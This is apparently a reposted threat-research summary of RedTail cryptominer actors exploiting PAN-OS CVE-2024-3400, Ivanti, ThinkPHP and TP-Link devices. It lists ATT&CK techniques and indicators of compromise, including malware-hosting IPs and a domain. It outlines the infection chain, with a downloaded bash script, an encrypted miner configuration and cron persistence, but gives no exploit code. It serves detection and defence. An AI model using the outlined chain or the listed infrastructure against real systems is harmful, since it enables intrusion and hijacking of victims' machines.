Threat Research

RedTail Cryptominer Threat Actors Adopt PAN-OS CVE-2024-3400 Exploit

admin

RedTail cryptominer actors have updated their toolkit to include Palo Alto PAN-OS CVE-2024-3400, leveraging private mining pools for tighter control over operations. The campaign features enhanced evasion, multiple exploit vectors across IoT devices and VPN/security products, and a polished, persistence-ready delivery infrastructure. Hashtags: #RedTail #PAN-OS #CVE-2024-3400 #IvantiConnectSecure #ThinkPHP #TP-Link #LazarusGroup #Monero #XMRig

Keypoints

  • RedTail cryptomining actors have incorporated CVE-2024-3400 (PAN-OS) into their toolkit since April 2024.
  • Attackers moved to private mining pools to gain greater control over mining outcomes, suggesting higher operational costs and sophistication.
  • The new variant includes antiresearch and persistence techniques, such as forking and cron-based startup.
  • Exploitation spans at least six vectors: IoT (TP-Link), ThinkPHP, SSL-VPNs (Ivanti Connect Secure), and security devices like Palo Alto components; PAN-OS is exploited since Apr 21.
  • Malware delivery uses a robust, multi-server infrastructure hosted by legitimate providers.
  • Indicators of compromise (IOCs) are documented to aid detection and mitigation.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The vulnerability allows an attacker to create an arbitrary file that could eventually enable command execution with root user privileges. ‘The vulnerability allows an attacker to create an arbitrary file that could eventually enable command execution with root user privileges’
  • [T1068] Exploitation for Privilege Escalation – The vulnerability could enable command execution with root privileges; ‘The vulnerability allows an attacker to create an arbitrary file that could eventually enable command execution with root user privileges’
  • [T1059.004] Command and Scripting Interpreter – Unix Shell – The botnet attempted to download and run a bash script; ‘attempts to execute commands that download and run a bash script’
  • [T1082] System Information Discovery – The script checks processor architecture (ARM, 86 bit, or 64 bit); ‘checking whether it is ARM, 86 bit, or 64 bit’
  • [T1105] Ingress Tool Transfer – The bash script downloads a compatible binary; ‘downloading the corresponding compatible binary’
  • [T1027] Obfuscated/Compressed Files and Information – The miner uses an encrypted configuration that is decrypted at runtime; ‘encrypted configuration. The miner comes with its mining configuration encrypted then decrypts it before passing control to XMRig’s code’
  • [T1053.005] Scheduled Task/Job – Cron-based persistence to survive reboots; ‘adds a cron job to survive a system reboot’

Indicators of Compromise

  • [IOC Type] Exports origin IP addresses – 92.118.39.120, 193.222.96.163
  • [IOC Type] Malware hosting servers – 193.222.96.163, 185.216.70.138
  • [IOC Type] Domain names – proxies.identitynetwork.top

Read more: https://www.akamai.com/blog/security-research/2024-redtail-cryptominer-pan-os-cve-exploit

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint